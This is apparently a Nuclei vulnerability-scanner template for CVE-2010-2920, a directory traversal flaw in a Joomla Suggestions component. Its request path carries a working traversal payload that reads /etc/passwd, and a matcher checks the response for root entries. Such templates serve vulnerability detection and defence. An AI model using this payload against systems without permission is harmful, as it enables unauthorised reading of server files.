nuclei-templates/http/cves/2010/CVE-2010-2920.yaml

44 lines
1.6 KiB
YAML

id: CVE-2010-2920
info:
name: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion
author: daffainfo
severity: medium
description: A directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
remediation: Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/12120
- https://nvd.nist.gov/vuln/detail/CVE-2010-2920
- http://www.vupen.com/english/advisories/2010/1844
- https://exchange.xforce.ibmcloud.com/vulnerabilities/57660
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
cve-id: CVE-2010-2920
cwe-id: CWE-22
epss-score: 0.03527
epss-percentile: 0.90489
cpe: cpe:2.3:a:foobla:com_foobla_suggestions:1.5.1.2:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: foobla
product: com_foobla_suggestions
tags: cve,cve2010,joomla,lfi,edb
http:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4a0a00473045022100fba67742beb40d6943a8b20419f62483846e2bc094eed60fee35457d6582ff9402202625a99f6ef903e5a06f0818c073ebdee82af5c93672ee69af9eb9f8060812ea:922c64590222798bb761d5b6d8e72950